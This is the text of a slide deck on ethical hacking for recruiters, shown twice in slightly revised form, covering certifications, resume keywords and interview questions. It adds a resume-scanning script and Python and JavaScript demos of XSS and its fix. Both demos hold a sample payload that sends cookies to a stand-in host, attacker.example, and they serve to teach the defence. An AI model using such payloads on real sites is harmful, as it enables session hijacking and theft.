Ethical Hacking & Penetration testing
General Knowledge
Ayman Mohammed – CEH
http://www.AymanMohammed.com
Outline
• Introduction
• Certificates
• Keywords
• Questions
• References
General tips about information security career
Introduction to Ethical Hacking
• Ethical hackers
▫ Employed by companies to perform penetration tests
• Penetration test
▫ Legal attempt to break into a company’s network to find its weakest link
▫ Tester only reports findings
• Security test
▫ More than an attempt to break in; also includes analyzing the company’s security policy and procedures
▫ Tester offers solutions to secure or protect the network
The Role of Security and Penetration Testers
• Hackers
▫ Access a computer system or network without authorization
▫ Break the law; can go to prison
• Crackers
▫ Break into systems to steal or destroy data
▫ The U.S. Department of Justice calls both "hackers"
• Ethical hacker
▫ Performs most of the same activities, but with the owner’s permission
Penetration-Testing Methodologies
• White box model
▫ Tester is told everything about the network topology and technology
▫ Tester is authorized to interview IT personnel and company employees
▫ Makes the tester’s job a little easier
• Black box model
▫ Company staff does not know about the test
▫ Tester is not given details about the network
  - Burden is on the tester to find these details
▫ Tests whether security personnel are able to detect an attack
• Gray box model
▫ Hybrid of the white and black box models
▫ Company gives the tester partial information
Ethical Hacking in a Nutshell
• What it takes to be a security tester
▫ Knowledge of network and computer technology
▫ Ability to communicate with management and IT personnel
▫ Understanding of the laws
▫ Ability to use the necessary tools
Known certificates in the cyber security field
Most famous certificates
• EC-Council
▫ CEH (Certified Ethical Hacker)
▫ ECSA (EC-Council Certified Security Analyst)
▫ LPT (Licensed Penetration Tester)
• SANS GIAC (Global Information Assurance Certification)
▫ GPEN (GIAC Certified Penetration Tester)
▫ GWAPT (GIAC Web Application Penetration Tester)
• OSSTMM (The Open Source Security Testing Methodology Manual)
▫ OPST (OSSTMM Professional Security Tester Accredited Certification)
▫ OPSA (OSSTMM Professional Security Analyst Accredited Certification)
▫ OPSE (OSSTMM Professional Security Expert Accredited Certification)
• Mile2
▫ CPTEngineer (Certified Pen Testing Engineer)
Keywords you need to know, and to search for inside the resume
Top Keywords
• Certificates:
▫ CEH, ICSSP, LPT, CPTEngineer, ECSA, GPEN, OPST, OPSA, OPSE, CISM, CISA
• Tools:
▫ Kali, Metasploit, sqlmap, Burp Suite, Acunetix, IBM AppScan, Nmap, Cain & Abel, Wireshark, Nessus, Snort, OpenSSH, BackTrack, Brutus, John the Ripper
• Methodologies:
▫ OWASP Top 10, PCI-DSS
• Vulnerabilities:
▫ XSS, SQL injection, CSRF, session hijacking, ...
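The slide above says to search the resume for these keywords. As an added example (not part of the original deck), the script below does that search with the slide's own keyword groups; the spelling variants it tolerates (BurpSuite, SQLi, the common misspelling "Acunitix", and so on) and the sample resume text are my own constructed additions.

```python
import re

# Keyword groups from the "Top Keywords" slide. The extra spelling variants
# (e.g. "BurpSuite", "SQLi", the common misspelling "Acunitix") are my own
# additions so that a resume is not missed over a formatting difference.
KEYWORDS = {
    "certificates": {
        "CEH": ["CEH", "Certified Ethical Hacker"],
        "ICSSP": ["ICSSP"],
        "LPT": ["LPT", "Licensed Penetration Tester"],
        "CPTEngineer": ["CPTEngineer", "Certified Pen Testing Engineer"],
        "ECSA": ["ECSA"],
        "GPEN": ["GPEN"],
        "OPST": ["OPST"],
        "OPSA": ["OPSA"],
        "OPSE": ["OPSE"],
        "CISM": ["CISM"],
        "CISA": ["CISA"],
    },
    "tools": {
        "Kali": ["Kali", "Kali Linux"],
        "Metasploit": ["Metasploit"],
        "sqlmap": ["sqlmap"],
        "Burp Suite": ["Burp Suite", "BurpSuite", "Burp"],
        "Acunetix": ["Acunetix", "Acunitix"],
        "IBM AppScan": ["AppScan"],
        "Nmap": ["Nmap"],
        "Cain & Abel": ["Cain & Abel", "Cain and Abel"],
        "Wireshark": ["Wireshark"],
        "Nessus": ["Nessus"],
        "Snort": ["Snort"],
        "OpenSSH": ["OpenSSH"],
        "BackTrack": ["BackTrack"],
        "Brutus": ["Brutus"],
        "John the Ripper": ["John the Ripper", "JtR"],
    },
    "methodologies": {
        "OWASP Top 10": ["OWASP Top 10", "OWASP Top Ten", "OWASP"],
        "PCI-DSS": ["PCI-DSS", "PCI DSS"],
    },
    "vulnerabilities": {
        "XSS": ["XSS", "Cross Site Scripting"],
        "SQL injection": ["SQL injection", "SQLi"],
        "CSRF": ["CSRF", "Cross Site Request Forgery"],
        "session hijacking": ["session hijacking"],
    },
}


def _compile(variant: str) -> re.Pattern:
    """Case-insensitive match on whole tokens; any run of spaces or hyphens
    between the words of a variant is accepted, so "Cross-Site Scripting"
    and "cross site scripting" both match the same entry."""
    words = [re.escape(w) for w in re.split(r"[\s-]+", variant)]
    body = r"[\s-]+".join(words)
    return re.compile(r"(?<![A-Za-z0-9])" + body + r"(?![A-Za-z0-9])", re.IGNORECASE)


PATTERNS = {
    category: {canon: [_compile(v) for v in variants] for canon, variants in group.items()}
    for category, group in KEYWORDS.items()
}


def scan_resume(text: str) -> dict:
    """Return, per category, the sorted canonical keywords present in text."""
    return {
        category: sorted(canon for canon, pats in group.items() if any(p.search(text) for p in pats))
        for category, group in PATTERNS.items()
    }


def missing_keywords(found: dict) -> dict:
    """Per category, the slide keywords the resume did not mention: a handy
    list of follow-up questions for the interview."""
    return {
        category: sorted(set(KEYWORDS[category]) - set(found.get(category, [])))
        for category in KEYWORDS
    }


# Constructed sample resume text (not a real candidate).
SAMPLE_RESUME = """
Security Tester - constructed sample CV
Certifications: Certified Ethical Hacker (CEH), GPEN, CISA.
Tools: Burp Suite, nmap, Metasploit Framework, wireshark, Acunitix scanner.
Assessed web applications against the OWASP top ten and PCI DSS requirements.
Reported cross-site scripting, SQLi and CSRF findings with remediation advice.
"""

if __name__ == "__main__":
    hits = scan_resume(SAMPLE_RESUME)
    for category, names in hits.items():
        print(f"{category}: {', '.join(names) or '-'}")
    print("not mentioned:", missing_keywords(hits))
```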
Some questions to assess penetration-testing knowledge
Questions & answers
• Q. What is XSS or Cross Site Scripting?
Ans. XSS, or cross-site scripting, is a type of vulnerability that hackers use to attack web applications.
It allows hackers to inject HTML or JavaScript code into a web page; the injected code can steal confidential information from cookies and return it to the hackers. It is one of the most critical and common techniques and needs to be prevented.
• Q. What is a honeypot?
Ans. A honeypot is a fake computer system that behaves like a real system and attracts hackers to attack it. A honeypot is used to find out about loopholes in the system and to provide solutions for these kinds of attacks.
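The XSS answer above describes injected script reading cookies. As an added example (my own code, not from the deck), the snippet below shows the vulnerable rendering beside the escaped one and the HttpOnly session cookie that blunts cookie theft even if an injection slips through; the greeting page, the parameter value and the attacker.example host name are constructed for the demonstration.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample value for the "name" query parameter of a greeting page.
# It is a demonstration string shaped like the cookie-stealing injection the
# slide describes; it is not taken from any real site.
UNTRUSTED_NAME = (
    '<script>new Image().src="http://attacker.example/?c="'
    '+document.cookie</script>'
)


def render_greeting_vulnerable(name: str) -> str:
    """'Before' form: the request parameter is pasted into the HTML verbatim.

    Any markup the visitor (or a link an attacker sent the visitor) supplies
    becomes part of the page and executes in the visitor's browser, where it
    can read the site's cookies.
    """
    return f"<html><body><h1>Hello, {name}!</h1></body></html>"


def render_greeting_safe(name: str) -> str:
    """'After' form: HTML-escape at the point of output.

    The same input is now shown as literal text; the browser never sees a
    <script> element, so nothing runs.
    """
    return f"<html><body><h1>Hello, {html.escape(name, quote=True)}!</h1></body></html>"


def page_contains_script(page: str) -> bool:
    """Coarse comparison helper: does the produced document still contain an
    unescaped <script tag?"""
    return "<script" in page.lower()


def session_cookie_header(session_id: str) -> str:
    """Second layer of defence, independent of output escaping.

    Marking the session cookie HttpOnly keeps document.cookie from exposing
    it to injected script, Secure restricts it to HTTPS, and SameSite limits
    cross-site sends. Returns the value part of a Set-Cookie header.
    """
    jar = SimpleCookie()
    jar["sid"] = session_id
    jar["sid"]["httponly"] = True
    jar["sid"]["secure"] = True
    jar["sid"]["samesite"] = "Lax"
    jar["sid"]["path"] = "/"
    return jar.output(header="").strip()


if __name__ == "__main__":
    unsafe = render_greeting_vulnerable(UNTRUSTED_NAME)
    safe = render_greeting_safe(UNTRUSTED_NAME)
    print("vulnerable page carries a live <script>:", page_contains_script(unsafe))
    print("escaped page carries a live <script>:   ", page_contains_script(safe))
    print("Set-Cookie:", session_cookie_header("constructed-session-id"))
```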
Questions & answers (cont.)
• Q. What types of tools are out there for packet sniffing?
Ans. Wireshark is probably the most common packet sniffing tool. This program can help you find odd traffic across the network or identify a program that is sending traffic silently from a host.
• Q. Which tools do you use to perform automated vulnerability testing?
Ans. There are many tools to do so; the most famous are Acunetix, IBM AppScan, Burp Suite and ZAP.
Where to start to gain more knowledge
• http://www.softwaretestinghelp.com/interview-questions/security-testing-interview-questions-and-answers/
• http://www.eccouncil.org/Certification/professional-series/ceh-course-outline
• http://www.zdnet.com/article/10-things-you-need-to-know-before-hiring-penetration-testers/
• https://www.owasp.org/index.php/Top_10_2013-Table_of_Contents
Recruiters' guide to hire an Ethical hacker

Most famous certificates
• EC-Council
▫ CEH (Certified Ethical Hacker)
▫ ECSA (EC-Council Certified Security Analyst)
▫ LPT (Licensed Penetration Tester)
• SANS GIAC (Global Information Assurance Certification)
▫ GPEN (GIAC Penetration Tester)
▫ GWAPT (GIAC Web Application Penetration Tester)
• ISECOM / OSSTMM (Open Source Security Testing Methodology Manual)
▫ OPST (OSSTMM Professional Security Tester)
▫ OPSA (OSSTMM Professional Security Analyst)
▫ OPSE (OSSTMM Professional Security Expert)
• Mile2
▫ CPTE (Certified Penetration Testing Engineer)
Keywords you need to know and look for in a résumé
Top Keywords
• Certificates:
▫ CEH, CISSP, LPT, CPTE, ECSA, GPEN, OPST, OPSA, OPSE, CISM, CISA
• Tools:
▫ Kali Linux, Metasploit, sqlmap, Burp Suite, Acunetix, IBM AppScan, Nmap, Cain & Abel, Wireshark, Nessus, Snort, OpenSSH, BackTrack, Brutus, John the Ripper
• Methodologies and standards:
▫ OWASP Top 10, PCI DSS
• Vulnerabilities:
▫ XSS, SQL injection, CSRF, session hijacking, ...
Some questions to assess penetration-testing knowledge
Questions & answers
• Q. What is XSS or Cross Site Scripting?
Ans. XSS (cross-site scripting) is a web-application vulnerability in which an attacker gets HTML or JavaScript of their choosing injected into a page that other users view. The injected script runs in the victim's browser, inside the application's origin, so it can read session cookies (unless they are marked HttpOnly), act on the site as the victim, and send stolen data back to the attacker. It is one of the most common and critical web vulnerabilities; the standard prevention is context-aware output encoding of untrusted data, backed by input validation.
• Q. What is a honeypot?
Ans. A honeypot is a decoy system that looks and behaves like a real system but has no production use, so any interaction with it is suspicious by definition. It is used to detect intrusions early and to observe attackers' tools and techniques and the weaknesses they target, so that defenses for the real systems can be improved.
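Added example, not from the original slides: the XSS answer above in code. A hypothetical comment renderer concatenates user input into HTML (the bug), the same renderer is shown with output encoding (the fix), and a Set-Cookie header with HttpOnly shows the defence-in-depth measure that keeps a session cookie out of document.cookie even when a script does run. The sample comment, the attacker.example host and the cookie value are constructed for the example.

```javascript
// Added example, not part of the original slide deck.
// Shows the XSS answer above in code: a hypothetical comment renderer that
// concatenates user input into HTML, the same renderer with output encoding,
// and the HttpOnly cookie attribute that stops a script reading the session cookie.

// Constructed sample input: a comment carrying a classic cookie-stealing payload
// (the host attacker.example is made up).
const SAMPLE_COMMENT =
  'Nice post! <img src=x onerror="fetch(\'https://attacker.example/?c=\' + document.cookie)">';

// Vulnerable: the comment is dropped straight into the markup, so the browser
// parses the <img> tag and runs its onerror handler in the application's origin.
function renderCommentVulnerable(comment) {
  return `<li class="comment">${comment}</li>`;
}

// Fix: encode every character that can open a tag or break out of an attribute,
// so the same payload is displayed as text and never parsed as markup.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderCommentSafe(comment) {
  return `<li class="comment">${escapeHtml(comment)}</li>`;
}

// Crude detector used to compare the two renderers: after removing the <li>
// wrapper the page itself emits, is any raw tag left in the fragment?
function containsRawTag(html) {
  const withoutWrapper = html.replace(/<\/?li[^>]*>/g, '');
  return /<[a-z][^>]*>/i.test(withoutWrapper);
}

// Defence in depth: an HttpOnly cookie is not exposed through document.cookie,
// so even a script that does run cannot exfiltrate it this way.
function sessionCookieHeader(sessionId) {
  return `session=${sessionId}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

console.log('vulnerable:', renderCommentVulnerable(SAMPLE_COMMENT));
console.log('raw tag present:', containsRawTag(renderCommentVulnerable(SAMPLE_COMMENT)));
console.log('safe:      ', renderCommentSafe(SAMPLE_COMMENT));
console.log('raw tag present:', containsRawTag(renderCommentSafe(SAMPLE_COMMENT)));
console.log('Set-Cookie:', sessionCookieHeader('0123456789abcdef'));
```

The encoding in escapeHtml is the one for HTML body and quoted-attribute contexts; data placed inside a script block, a URL or a CSS value needs the encoding for that context instead, which is why the answer above says "context-aware".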
Questions & answers (cont.)
• Q. What type of tools are there out there for packet sniffing?
Ans. Wireshark is probably the most common packet-sniffing tool. It captures and decodes the traffic on a network interface, which helps you find odd traffic across the network or identify a program that is silently sending traffic from a host.
• Q. Which tools do you use for automated vulnerability testing?
Ans. There are many; the best-known are Acunetix, IBM AppScan, Burp Suite (its scanner) and OWASP ZAP.
References
• http://www.softwaretestinghelp.com/interview-questions/security-testing-interview-questions-and-answers/
• http://www.eccouncil.org/Certification/professional-series/ceh-course-outline
• http://www.zdnet.com/article/10-things-you-need-to-know-before-hiring-penetration-testers/
• https://www.owasp.org/index.php/Top_10_2013-Table_of_Contents